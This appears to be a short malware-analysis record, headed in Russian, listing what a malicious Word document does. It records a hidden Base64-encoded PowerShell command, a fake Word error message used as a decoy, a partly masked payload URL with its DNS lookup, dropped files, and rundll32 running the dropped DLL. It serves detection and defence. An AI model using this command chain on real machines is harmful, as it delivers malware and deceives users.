Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD UwBWACAAIAB0ADQAQgA3AGsAIAAoACAAWwBUAFkAUABFAF0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9AHsAMwB9ACIALQBmACcAbwAuAEQAaQAnACwAJwBzAFkAcwBUAEUATQAnACwAJwAuAGkAJwAsACcAUgBlAGMA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1568
- %TEMP%\1089448.cvr
- %HOMEPATH%\e1bad5e\rvmn7kd\fhdtme10.dll
- http://se#########ompass.inifaresworkshops.com/vr6ebzold.png
- DNS ASK se#########ompass.inifaresworkshops.com
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD UwBWACAAIAB0ADQAQgA3AGsAIAAoACAAWwBUAFkAUABFAF0AKAAiAHsAMQB9AH...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\E1bad5e\Rvmn7kd\Fhdtme10.dll 0